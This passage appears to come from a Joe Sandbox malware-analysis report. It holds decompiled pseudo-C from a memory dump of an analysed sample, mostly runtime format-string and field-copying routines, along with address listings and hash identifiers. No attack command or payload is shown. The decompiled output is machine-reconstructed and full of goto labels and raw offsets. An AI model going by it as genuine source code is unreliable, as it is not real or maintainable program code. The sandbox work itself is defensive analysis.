                    							 *(_t220 + 0x310) = _t242;
                    							_t284 = ( *(_t304 + 0x5d) >> 0x00000002 & 1) << 0x00000008 | _t242 & 0x0000feff;
                    							 *(_t220 + 0x310) = _t284;
                    							_t245 = ( *(_t304 + 0x5d) >> 0x00000003 & 1) << 0x00000009 | _t284 & 0x0000fdff;
                    							 *(_t220 + 0x310) = _t245;
                    							 *(_t220 + 0x310) =  *(_t304 + 0x5d) >> 0x00000006 & 0x000000ff | _t245 & 0x0000fffc;
                    							_t249 = ( *(_t304 + 0x5e) >> 0x00000006 & 1) << 0x00000003 |  *(_t220 + 0x314) & 0x0000fff7;
                    							 *(_t220 + 0x314) = _t249;
                    							_t287 = ( *(_t304 + 0x5e) >> 0x00000007 & 0x000000ff) << 0x00000004 | _t249 & 0x0000ffef;
                    							 *(_t220 + 0x314) = _t287;
                    							_t252 = ( *(_t304 + 0x5f) & 1) << 0x00000006 | _t287 & 0x0000ffbf;
                    							 *(_t220 + 0x314) = _t252;
                    							_t290 = 1;
                    							 *(_t220 + 0x314) = ( *(_t304 + 0x61) >> 0x00000005 & 1) << 0x0000000f | _t252 & 0x00007fff;
                    							 *((intOrPtr*)(_t220 + 0x12c)) =  *((intOrPtr*)(_t304 + 0x24));
                    							 *((intOrPtr*)(_t220 + 0x130)) =  *((intOrPtr*)(_t304 + 0x28));
                    							 *((intOrPtr*)(_t220 + 0x134)) =  *((intOrPtr*)(_t304 + 0x2c));
                    							 *((intOrPtr*)(_t220 + 0x138)) =  *((intOrPtr*)(_t304 + 0x30));
                    							 *((intOrPtr*)(_t220 + 0x150)) =  *((intOrPtr*)(_t304 + 0x34));
                    							 *((intOrPtr*)(_t220 + 0x164)) =  *((intOrPtr*)(_t304 + 0x38));
                    							 *((intOrPtr*)(_t220 + 0x168)) =  *((intOrPtr*)(_t304 + 0x3c));
                    							 *((intOrPtr*)(_t220 + 0x154)) =  *((intOrPtr*)(_t304 + 0x40));
                    							 *(_t220 + 0x158) =  *(_t220 + 0x158) ^ ( *(_t220 + 0x158) ^  *(_t304 + 0x44)) & 0x0000007f;
                    							 *(_t220 + 0x158) = ( *(_t304 + 0x44) ^  *(_t220 + 0x158)) & 0x0000007f ^  *(_t304 + 0x44);
                    							 *((intOrPtr*)(_t220 + 0x15c)) =  *((intOrPtr*)(_t304 + 0x48));
                    							 *((intOrPtr*)(_t220 + 0x160)) =  *((intOrPtr*)(_t304 + 0x4c));
                    							if(_t292 == 0) {
                    								_t303 =  *(_t304 + 0x54);
                    								if(_t303 == 0) {
                    									E004368A0(_t292,  *(_t220 + 4), 0, 0x158);
                    									_t290 = 1;
                    								} else {
                    									_t262 = 0x56;
                    									memcpy( *(_t220 + 4), _t303, _t262 << 2);
                    								}
                    								if(( *(_t220 + 0x310) & 0x00000030) != 0x30) {
                    									_t290 = E0041D4D2(_t220);
                    								}
                    							}
                    							 *((intOrPtr*)(_t220 + 0x90)) =  *((intOrPtr*)(_t304 + 0x6c));
                    							 *((intOrPtr*)(_t220 + 0x94)) =  *((intOrPtr*)(_t304 + 0x70));
                    							 *((char*)(_t220 + 0x216)) =  *((intOrPtr*)(_t304 + 0x5c));
                    							return _t290;
                    						}
                    					} else {
                    						goto L14;
                    					}
                    				}
                    			}





























                    0x0041d580
                    0x0041d580
                    0x0041d582
                    0x0041d584
                    0x0041d589
                    0x0041d976
                    0x00000000
                    0x0041d597
                    0x0041d59b
                    0x0041d59f
                    0x0041d5a9
                    0x0041d5ad
                    0x0041d5af
                    0x0041d5af
                    0x0041d5b9
                    0x0041d5c0
                    0x0041d97e
                    0x0041d5c6
                    0x0041d5c6
                    0x0041d5d0
                    0x0041d5d4
                    0x0041d5e2
                    0x0041d5ec
                    0x0041d5f8
                    0x0041d601
                    0x0041d60a
                    0x0041d629
                    0x0041d62e
                    0x0041d64b
                    0x0041d64e
                    0x0041d658
                    0x0041d67f
                    0x0041d682
                    0x0041d6a1
                    0x0041d6a4
                    0x0041d6c3
                    0x0041d6c6
                    0x0041d6e4
                    0x0041d6e7
                    0x0041d70c
                    0x0041d71a
                    0x0041d725
                    0x0041d730
                    0x0041d749
                    0x0041d751
                    0x0041d76c
                    0x0041d76f
                    0x0041d78b
                    0x0041d78e
                    0x0041d7ac
                    0x0041d7af
                    0x0041d7ce
                    0x0041d7d1
                    0x0041d7f0
                    0x0041d7f3
                    0x0041d80c
                    0x0041d82c
                    0x0041d82f
                    0x0041d84c
                    0x0041d84f
                    0x0041d86b
                    0x0041d870
                    0x0041d877
                    0x0041d890
                    0x0041d89a
                    0x0041d8a3
                    0x0041d8ac
                    0x0041d8b5
                    0x0041d8be
                    0x0041d8c7
                    0x0041d8d0
                    0x0041d8d9
                    0x0041d8ea
                    0x0041d8ff
                    0x0041d908
                    0x0041d911
                    0x0041d919
                    0x0041d91b
                    0x0041d920
                    0x0041d936
                    0x0041d940
                    0x0041d922
                    0x0041d927
                    0x0041d928
                    0x0041d928
                    0x0041d94b
                    0x0041d954
                    0x0041d954
                    0x0041d94b
                    0x0041d95b
                    0x0041d964
                    0x0041d96d
                    0x00000000
                    0x0041d973
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041d59f

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20c1e536d4bc8b6faf6c327046f17b9793f6c9e01803ad6dff290a168d19a878
                    • Instruction ID: 4be97372677ae0dad855f8a46ba8d51cf672321a2aeebabcb78680e031a1f995
                    • Opcode Fuzzy Hash: 20c1e536d4bc8b6faf6c327046f17b9793f6c9e01803ad6dff290a168d19a878
                    • Instruction Fuzzy Hash: 9DB1947951429A8ACB05EF64C4913F63BA1EF6A300F0850B9EC9CCF757E2398506EB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E0043DCBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _t52;
                    				signed int _t54;
                    				signed int _t55;
                    				void* _t56;
                    				signed char _t60;
                    				signed char _t62;
                    				signed int _t64;
                    				void* _t65;
                    				signed int _t66;
                    				signed char _t75;
                    				signed char _t78;
                    				void* _t86;
                    				void* _t88;
                    				signed char _t90;
                    				signed char _t92;
                    				signed int _t93;
                    				signed int _t96;
                    				signed int _t98;
                    				signed int _t99;
                    				signed int _t103;
                    				signed int* _t104;
                    				void* _t106;
                    				signed int _t112;
                    				unsigned int _t114;
                    				signed char _t116;
                    				void* _t124;
                    				unsigned int _t125;
                    				void* _t126;
                    				signed int _t127;
                    				short _t128;
                    				void* _t131;
                    				void* _t133;
                    				intOrPtr* _t135;
                    				signed int _t136;
                    				void* _t137;
                    				void* _t139;
                    				void* _t140;
                    
                    				_t126 = __edi;
                    				_t52 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t52 ^ _t136;
                    				_t135 = __ecx;
                    				_t103 = 0;
                    				_t124 = 0x41;
                    				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                    				_t106 = 0x58;
                    				_t139 = _t54 - 0x64;
                    				if(_t139 > 0) {
                    					__eflags = _t54 - 0x70;
                    					if(__eflags > 0) {
                    						_t55 = _t54 - 0x73;
                    						__eflags = _t55;
                    						if(_t55 == 0) {
                    							L9:
                    							_t56 = E0043E94A(_t135);
                    							L10:
                    							if(_t56 != 0) {
                    								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
                    								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
                    									L71:
                    									L72:
                    									return E004349BB(_v8 ^ _t136);
                    								}
                    								_t125 =  *(_t135 + 0x20);
                    								_push(_t126);
                    								_v16 = _t103;
                    								_t60 = _t125 >> 4;
                    								_v12 = _t103;
                    								_t127 = 0x20;
                    								__eflags = 1 & _t60;
                    								if((1 & _t60) == 0) {
                    									L46:
                    									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
                    									__eflags = _t112 - 0x78;
                    									if(_t112 == 0x78) {
                    										L48:
                    										_t62 = _t125 >> 5;
                    										__eflags = _t62 & 0x00000001;
                    										if((_t62 & 0x00000001) == 0) {
                    											L50:
                    											__eflags = 0;
                    											L51:
                    											__eflags = _t112 - 0x61;
                    											if(_t112 == 0x61) {
                    												L54:
                    												_t64 = 1;
                    												L55:
                    												_t128 = 0x30;
                    												__eflags = _t64;
                    												if(_t64 != 0) {
                    													L57:
                    													_t65 = 0x58;
                    													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
                    													__eflags = _t112 - _t65;
                    													if(_t112 == _t65) {
                    														L60:
                    														_t66 = 1;
                    														L61:
                    														__eflags = _t66;
                    														asm("cbw");
                    														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                    														_t103 = _t103 + 2;
                    														__eflags = _t103;
                    														L62:
                    														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
                    														__eflags = _t125 & 0x0000000c;
                    														if((_t125 & 0x0000000c) == 0) {
                    															E0043C49D(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
                    															_t137 = _t137 + 0x10;
                    														}
                    														E0043EED0(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
                    														_t114 =  *(_t135 + 0x20);
                    														_t104 = _t135 + 0x18;
                    														_t75 = _t114 >> 3;
                    														__eflags = _t75 & 0x00000001;
                    														if((_t75 & 0x00000001) != 0) {
                    															_t116 = _t114 >> 2;
                    															__eflags = _t116 & 0x00000001;
                    															if((_t116 & 0x00000001) == 0) {
                    																E0043C49D(_t135 + 0x448, 0x30, _t131, _t104);
                    																_t137 = _t137 + 0x10;
                    															}
                    														}
                    														E0043ED30(_t135, _t125, 0);
                    														__eflags =  *_t104;
                    														if( *_t104 >= 0) {
                    															_t78 =  *(_t135 + 0x20) >> 2;
                    															__eflags = _t78 & 0x00000001;
                    															if((_t78 & 0x00000001) != 0) {
                    																E0043C49D(_t135 + 0x448, 0x20, _t131, _t104);
                    															}
                    														}
                    														goto L71;
                    													}
                    													_t86 = 0x41;
                    													__eflags = _t112 - _t86;
                    													if(_t112 == _t86) {
                    														goto L60;
                    													}
                    													_t66 = 0;
                    													goto L61;
                    												}
                    												__eflags = _t64;
                    												if(_t64 == 0) {
                    													goto L62;
                    												}
                    												goto L57;
                    											}
                    											_t133 = 0x41;
                    											__eflags = _t112 - _t133;
                    											if(_t112 == _t133) {
                    												goto L54;
                    											}
                    											_t64 = 0;
                    											goto L55;
                    										}
                    										goto L51;
                    									}
                    									_t88 = 0x58;
                    									__eflags = _t112 - _t88;
                    									if(_t112 != _t88) {
                    										goto L50;
                    									}
                    									goto L48;
                    								}
                    								_t90 = _t125 >> 6;
                    								__eflags = 1 & _t90;
                    								if((1 & _t90) == 0) {
                    									__eflags = 1 & _t125;
                    									if((1 & _t125) == 0) {
                    										_t92 = _t125 >> 1;
                    										__eflags = 1 & _t92;
                    										if((1 & _t92) == 0) {
                    											goto L46;
                    										}
                    										_v16 = _t127;
                    										L45:
                    										_t103 = 1;
                    										goto L46;
                    									}
                    									_push(0x2b);
                    									L40:
                    									_pop(_t93);
                    									_v16 = _t93;
                    									goto L45;
                    								}
                    								_push(0x2d);
                    								goto L40;
                    							}
                    							L11:
                    							goto L72;
                    						}
                    						_t96 = _t55;
                    						__eflags = _t96;
                    						if(__eflags == 0) {
                    							L28:
                    							_push(_t103);
                    							_push(0xa);
                    							L29:
                    							_t56 = E0043E6E2(_t135, _t126, __eflags);
                    							goto L10;
                    						}
                    						__eflags = _t96 - 3;
                    						if(__eflags != 0) {
                    							goto L11;
                    						}
                    						_push(0);
                    						L13:
                    						_push(0x10);
                    						goto L29;
                    					}
                    					if(__eflags == 0) {
                    						_t56 = E0043E8BF(__ecx);
                    						goto L10;
                    					}
                    					__eflags = _t54 - 0x67;
                    					if(_t54 <= 0x67) {
                    						L30:
                    						_t56 = E0043E448(_t103, _t135);
                    						goto L10;
                    					}
                    					__eflags = _t54 - 0x69;
                    					if(_t54 == 0x69) {
                    						L27:
                    						_t3 = _t135 + 0x20;
                    						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
                    						__eflags =  *_t3;
                    						goto L28;
                    					}
                    					__eflags = _t54 - 0x6e;
                    					if(_t54 == 0x6e) {
                    						_t56 = E0043E82C(__ecx, _t124);
                    						goto L10;
                    					}
                    					__eflags = _t54 - 0x6f;
                    					if(_t54 != 0x6f) {
                    						goto L11;
                    					}
                    					_t56 = E0043E8A0(__ecx);
                    					goto L10;
                    				}
                    				if(_t139 == 0) {
                    					goto L27;
                    				}
                    				_t140 = _t54 - _t106;
                    				if(_t140 > 0) {
                    					_t98 = _t54 - 0x5a;
                    					__eflags = _t98;
                    					if(_t98 == 0) {
                    						_t56 = E0043E28B(__ecx);
                    						goto L10;
                    					}
                    					_t99 = _t98 - 7;
                    					__eflags = _t99;
                    					if(_t99 == 0) {
                    						goto L30;
                    					}
                    					__eflags = _t99;
                    					if(__eflags != 0) {
                    						goto L11;
                    					}
                    					L17:
                    					_t56 = E0043E64A(_t135, __eflags, _t103);
                    					goto L10;
                    				}
                    				if(_t140 == 0) {
                    					_push(1);
                    					goto L13;
                    				}
                    				if(_t54 == _t124) {
                    					goto L30;
                    				}
                    				if(_t54 == 0x43) {
                    					goto L17;
                    				}
                    				if(_t54 <= 0x44) {
                    					goto L11;
                    				}
                    				if(_t54 <= 0x47) {
                    					goto L30;
                    				}
                    				if(_t54 != 0x53) {
                    					goto L11;
                    				}
                    				goto L9;
                    			}











































                    0x0043dcbb
                    0x0043dcc3
                    0x0043dcca
                    0x0043dccf
                    0x0043dcd1
                    0x0043dcd5
                    0x0043dcd8
                    0x0043dcdc
                    0x0043dcdd
                    0x0043dce0
                    0x0043dd4d
                    0x0043dd50
                    0x0043dd9f
                    0x0043dd9f
                    0x0043dda2
                    0x0043dd0e
                    0x0043dd10
                    0x0043dd15
                    0x0043dd17
                    0x0043ddbd
                    0x0043ddc0
                    0x0043df06
                    0x0043df08
                    0x0043df17
                    0x0043df17
                    0x0043ddc6
                    0x0043ddcb
                    0x0043ddce
                    0x0043ddd1
                    0x0043ddd5
                    0x0043dddb
                    0x0043dddc
                    0x0043ddde
                    0x0043de08
                    0x0043de08
                    0x0043de0c
                    0x0043de0f
                    0x0043de19
                    0x0043de1b
                    0x0043de1e
                    0x0043de20
                    0x0043de26
                    0x0043de26
                    0x0043de28
                    0x0043de28
                    0x0043de2b
                    0x0043de39
                    0x0043de39
                    0x0043de3b
                    0x0043de3d
                    0x0043de3e
                    0x0043de40
                    0x0043de46
                    0x0043de48
                    0x0043de49
                    0x0043de4e
                    0x0043de51
                    0x0043de5f
                    0x0043de5f
                    0x0043de61
                    0x0043de61
                    0x0043de6c
                    0x0043de6e
                    0x0043de73
                    0x0043de73
                    0x0043de76
                    0x0043de7c
                    0x0043de7e
                    0x0043de81
                    0x0043de91
                    0x0043de96
                    0x0043de96
                    0x0043deab
                    0x0043deb0
                    0x0043deb3
                    0x0043deb8
                    0x0043debb
                    0x0043debd
                    0x0043debf
                    0x0043dec2
                    0x0043dec5
                    0x0043ded2
                    0x0043ded7
                    0x0043ded7
                    0x0043dec5
                    0x0043dede
                    0x0043dee3
                    0x0043dee6
                    0x0043deeb
                    0x0043deee
                    0x0043def0
                    0x0043defd
                    0x0043df02
                    0x0043def0
                    0x00000000
                    0x0043df05
                    0x0043de55
                    0x0043de56
                    0x0043de59
                    0x00000000
                    0x00000000
                    0x0043de5b
                    0x00000000
                    0x0043de5b
                    0x0043de42
                    0x0043de44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043de44
                    0x0043de2f
                    0x0043de30
                    0x0043de33
                    0x00000000
                    0x00000000
                    0x0043de35
                    0x00000000
                    0x0043de35
                    0x00000000
                    0x0043de22
                    0x0043de13
                    0x0043de14
                    0x0043de17
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043de17
                    0x0043dde2
                    0x0043dde5
                    0x0043dde7
                    0x0043ddf2
                    0x0043ddf4
                    0x0043ddfc
                    0x0043ddfe
                    0x0043de00
                    0x00000000
                    0x00000000
                    0x0043de02
                    0x0043de06
                    0x0043de06
                    0x00000000
                    0x0043de06
                    0x0043ddf6
                    0x0043ddeb
                    0x0043ddeb
                    0x0043ddec
                    0x00000000
                    0x0043ddec
                    0x0043dde9
                    0x00000000
                    0x0043dde9
                    0x0043dd1d
                    0x00000000
                    0x0043dd1d
                    0x0043dda9
                    0x0043dda9
                    0x0043ddac
                    0x0043dd7e
                    0x0043dd7e
                    0x0043dd7f
                    0x0043dd81
                    0x0043dd83
                    0x00000000
                    0x0043dd83
                    0x0043ddae
                    0x0043ddb1
                    0x00000000
                    0x00000000
                    0x0043ddb7
                    0x0043dd26
                    0x0043dd26
                    0x00000000
                    0x0043dd26
                    0x0043dd52
                    0x0043dd95
                    0x00000000
                    0x0043dd95
                    0x0043dd54
                    0x0043dd57
                    0x0043dd8a
                    0x0043dd8c
                    0x00000000
                    0x0043dd8c
                    0x0043dd59
                    0x0043dd5c
                    0x0043dd7a
                    0x0043dd7a
                    0x0043dd7a
                    0x0043dd7a
                    0x00000000
                    0x0043dd7a
                    0x0043dd5e
                    0x0043dd61
                    0x0043dd73
                    0x00000000
                    0x0043dd73
                    0x0043dd63
                    0x0043dd66
                    0x00000000
                    0x00000000
                    0x0043dd6a
                    0x00000000
                    0x0043dd6a
                    0x0043dce2
                    0x00000000
                    0x00000000
                    0x0043dce8
                    0x0043dcea
                    0x0043dd2a
                    0x0043dd2a
                    0x0043dd2d
                    0x0043dd46
                    0x00000000
                    0x0043dd46
                    0x0043dd2f
                    0x0043dd2f
                    0x0043dd32
                    0x00000000
                    0x00000000
                    0x0043dd35
                    0x0043dd38
                    0x00000000
                    0x00000000
                    0x0043dd3a
                    0x0043dd3d
                    0x00000000
                    0x0043dd3d
                    0x0043dcec
                    0x0043dd24
                    0x00000000
                    0x0043dd24
                    0x0043dcf0
                    0x00000000
                    0x00000000
                    0x0043dcf9
                    0x00000000
                    0x00000000
                    0x0043dcfe
                    0x00000000
                    0x00000000
                    0x0043dd03
                    0x00000000
                    0x00000000
                    0x0043dd0c
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bdbc6bd1d11330bbec411726365f90614e01d55c38c66fff260986e16615255e
                    • Instruction ID: 9182ae1094638dbff51debc2cdef22ec5a2eae2fa5e3a8d7621001060718f8f7
                    • Opcode Fuzzy Hash: bdbc6bd1d11330bbec411726365f90614e01d55c38c66fff260986e16615255e
                    • Instruction Fuzzy Hash: 6D615471E00A0996DA389A29B8927BF3394EB6D704F24341FE843DF3C5D65D9D42861E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E0043DF18(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _t52;
                    				signed int _t54;
                    				signed int _t55;
                    				void* _t56;
                    				signed char _t60;
                    				signed char _t62;
                    				signed int _t64;
                    				void* _t65;
                    				signed int _t66;
                    				signed char _t75;
                    				signed char _t78;
                    				void* _t86;
                    				void* _t88;
                    				signed char _t90;
                    				signed char _t92;
                    				signed int _t93;
                    				signed int _t96;
                    				signed int _t98;
                    				signed int _t99;
                    				signed int _t103;
                    				signed int* _t104;
                    				void* _t106;
                    				signed int _t112;
                    				unsigned int _t114;
                    				signed char _t116;
                    				void* _t124;
                    				unsigned int _t125;
                    				void* _t126;
                    				signed int _t127;
                    				short _t128;
                    				void* _t131;
                    				void* _t133;
                    				intOrPtr* _t135;
                    				signed int _t136;
                    				void* _t137;
                    				void* _t139;
                    				void* _t140;
                    
                    				_t126 = __edi;
                    				_t52 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t52 ^ _t136;
                    				_t135 = __ecx;
                    				_t103 = 0;
                    				_t124 = 0x41;
                    				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                    				_t106 = 0x58;
                    				_t139 = _t54 - 0x64;
                    				if(_t139 > 0) {
                    					__eflags = _t54 - 0x70;
                    					if(__eflags > 0) {
                    						_t55 = _t54 - 0x73;
                    						__eflags = _t55;
                    						if(_t55 == 0) {
                    							L9:
                    							_t56 = E0043E94A(_t135);
                    							L10:
                    							if(_t56 != 0) {
                    								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
                    								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
                    									L71:
                    									L72:
                    									return E004349BB(_v8 ^ _t136);
                    								}
                    								_t125 =  *(_t135 + 0x20);
                    								_push(_t126);
                    								_v16 = _t103;
                    								_t60 = _t125 >> 4;
                    								_v12 = _t103;
                    								_t127 = 0x20;
                    								__eflags = 1 & _t60;
                    								if((1 & _t60) == 0) {
                    									L46:
                    									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
                    									__eflags = _t112 - 0x78;
                    									if(_t112 == 0x78) {
                    										L48:
                    										_t62 = _t125 >> 5;
                    										__eflags = _t62 & 0x00000001;
                    										if((_t62 & 0x00000001) == 0) {
                    											L50:
                    											__eflags = 0;
                    											L51:
                    											__eflags = _t112 - 0x61;
                    											if(_t112 == 0x61) {
                    												L54:
                    												_t64 = 1;
                    												L55:
                    												_t128 = 0x30;
                    												__eflags = _t64;
                    												if(_t64 != 0) {
                    													L57:
                    													_t65 = 0x58;
                    													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
                    													__eflags = _t112 - _t65;
                    													if(_t112 == _t65) {
                    														L60:
                    														_t66 = 1;
                    														L61:
                    														__eflags = _t66;
                    														asm("cbw");
                    														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                    														_t103 = _t103 + 2;
                    														__eflags = _t103;
                    														L62:
                    														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
                    														__eflags = _t125 & 0x0000000c;
                    														if((_t125 & 0x0000000c) == 0) {
                    															E0043C4FA(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
                    															_t137 = _t137 + 0x10;
                    														}
                    														E0043EFF0(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
                    														_t114 =  *(_t135 + 0x20);
                    														_t104 = _t135 + 0x18;
                    														_t75 = _t114 >> 3;
                    														__eflags = _t75 & 0x00000001;
                    														if((_t75 & 0x00000001) != 0) {
                    															_t116 = _t114 >> 2;
                    															__eflags = _t116 & 0x00000001;
                    															if((_t116 & 0x00000001) == 0) {
                    																E0043C4FA(_t135 + 0x448, 0x30, _t131, _t104);
                    																_t137 = _t137 + 0x10;
                    															}
                    														}
                    														E0043EDBB(_t135, 0);
                    														__eflags =  *_t104;
                    														if( *_t104 >= 0) {
                    															_t78 =  *(_t135 + 0x20) >> 2;
                    															__eflags = _t78 & 0x00000001;
                    															if((_t78 & 0x00000001) != 0) {
                    																E0043C4FA(_t135 + 0x448, 0x20, _t131, _t104);
                    															}
                    														}
                    														goto L71;
                    													}
                    													_t86 = 0x41;
                    													__eflags = _t112 - _t86;
                    													if(_t112 == _t86) {
                    														goto L60;
                    													}
                    													_t66 = 0;
                    													goto L61;
                    												}
                    												__eflags = _t64;
                    												if(_t64 == 0) {
                    													goto L62;
                    												}
                    												goto L57;
                    											}
                    											_t133 = 0x41;
                    											__eflags = _t112 - _t133;
                    											if(_t112 == _t133) {
                    												goto L54;
                    											}
                    											_t64 = 0;
                    											goto L55;
                    										}
                    										goto L51;
                    									}
                    									_t88 = 0x58;
                    									__eflags = _t112 - _t88;
                    									if(_t112 != _t88) {
                    										goto L50;
                    									}
                    									goto L48;
                    								}
                    								_t90 = _t125 >> 6;
                    								__eflags = 1 & _t90;
                    								if((1 & _t90) == 0) {
                    									__eflags = 1 & _t125;
                    									if((1 & _t125) == 0) {
                    										_t92 = _t125 >> 1;
                    										__eflags = 1 & _t92;
                    										if((1 & _t92) == 0) {
                    											goto L46;
                    										}
                    										_v16 = _t127;
                    										L45:
                    										_t103 = 1;
                    										goto L46;
                    									}
                    									_push(0x2b);
                    									L40:
                    									_pop(_t93);
                    									_v16 = _t93;
                    									goto L45;
                    								}
                    								_push(0x2d);
                    								goto L40;
                    							}
                    							L11:
                    							goto L72;
                    						}
                    						_t96 = _t55;
                    						__eflags = _t96;
                    						if(__eflags == 0) {
                    							L28:
                    							_push(_t103);
                    							_push(0xa);
                    							L29:
                    							_t56 = E0043E6E2(_t135, _t126, __eflags);
                    							goto L10;
                    						}
                    						__eflags = _t96 - 3;
                    						if(__eflags != 0) {
                    							goto L11;
                    						}
                    						_push(0);
                    						L13:
                    						_push(0x10);
                    						goto L29;
                    					}
                    					if(__eflags == 0) {
                    						_t56 = E0043E8BF(__ecx);
                    						goto L10;
                    					}
                    					__eflags = _t54 - 0x67;
                    					if(_t54 <= 0x67) {
                    						L30:
                    						_t56 = E0043E448(_t103, _t135);
                    						goto L10;
                    					}
                    					__eflags = _t54 - 0x69;
                    					if(_t54 == 0x69) {
                    						L27:
                    						_t3 = _t135 + 0x20;
                    						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
                    						__eflags =  *_t3;
                    						goto L28;
                    					}
                    					__eflags = _t54 - 0x6e;
                    					if(_t54 == 0x6e) {
                    						_t56 = E0043E82C(__ecx, _t124);
                    						goto L10;
                    					}
                    					__eflags = _t54 - 0x6f;
                    					if(_t54 != 0x6f) {
                    						goto L11;
                    					}
                    					_t56 = E0043E8A0(__ecx);
                    					goto L10;
                    				}
                    				if(_t139 == 0) {
                    					goto L27;
                    				}
                    				_t140 = _t54 - _t106;
                    				if(_t140 > 0) {
                    					_t98 = _t54 - 0x5a;
                    					__eflags = _t98;
                    					if(_t98 == 0) {
                    						_t56 = E0043E28B(__ecx);
                    						goto L10;
                    					}
                    					_t99 = _t98 - 7;
                    					__eflags = _t99;
                    					if(_t99 == 0) {
                    						goto L30;
                    					}
                    					__eflags = _t99;
                    					if(__eflags != 0) {
                    						goto L11;
                    					}
                    					L17:
                    					_t56 = E0043E64A(_t135, __eflags, _t103);
                    					goto L10;
                    				}
                    				if(_t140 == 0) {
                    					_push(1);
                    					goto L13;
                    				}
                    				if(_t54 == _t124) {
                    					goto L30;
                    				}
                    				if(_t54 == 0x43) {
                    					goto L17;
                    				}
                    				if(_t54 <= 0x44) {
                    					goto L11;
                    				}
                    				if(_t54 <= 0x47) {
                    					goto L30;
                    				}
                    				if(_t54 != 0x53) {
                    					goto L11;
                    				}
                    				goto L9;
                    			}











































                    0x0043df18
                    0x0043df20
                    0x0043df27
                    0x0043df2c
                    0x0043df2e
                    0x0043df32
                    0x0043df35
                    0x0043df39
                    0x0043df3a
                    0x0043df3d
                    0x0043dfaa
                    0x0043dfad
                    0x0043dffc
                    0x0043dffc
                    0x0043dfff
                    0x0043df6b
                    0x0043df6d
                    0x0043df72
                    0x0043df74
                    0x0043e01a
                    0x0043e01d
                    0x0043e163
                    0x0043e165
                    0x0043e174
                    0x0043e174
                    0x0043e023
                    0x0043e028
                    0x0043e02b
                    0x0043e02e
                    0x0043e032
                    0x0043e038
                    0x0043e039
                    0x0043e03b
                    0x0043e065
                    0x0043e065
                    0x0043e069
                    0x0043e06c
                    0x0043e076
                    0x0043e078
                    0x0043e07b
                    0x0043e07d
                    0x0043e083
                    0x0043e083
                    0x0043e085
                    0x0043e085
                    0x0043e088
                    0x0043e096
                    0x0043e096
                    0x0043e098
                    0x0043e09a
                    0x0043e09b
                    0x0043e09d
                    0x0043e0a3
                    0x0043e0a5
                    0x0043e0a6
                    0x0043e0ab
                    0x0043e0ae
                    0x0043e0bc
                    0x0043e0bc
                    0x0043e0be
                    0x0043e0be
                    0x0043e0c9
                    0x0043e0cb
                    0x0043e0d0
                    0x0043e0d0
                    0x0043e0d3
                    0x0043e0d9
                    0x0043e0db
                    0x0043e0de
                    0x0043e0ee
                    0x0043e0f3
                    0x0043e0f3
                    0x0043e108
                    0x0043e10d
                    0x0043e110
                    0x0043e115
                    0x0043e118
                    0x0043e11a
                    0x0043e11c
                    0x0043e11f
                    0x0043e122
                    0x0043e12f
                    0x0043e134
                    0x0043e134
                    0x0043e122
                    0x0043e13b
                    0x0043e140
                    0x0043e143
                    0x0043e148
                    0x0043e14b
                    0x0043e14d
                    0x0043e15a
                    0x0043e15f
                    0x0043e14d
                    0x00000000
                    0x0043e162
                    0x0043e0b2
                    0x0043e0b3
                    0x0043e0b6
                    0x00000000
                    0x00000000
                    0x0043e0b8
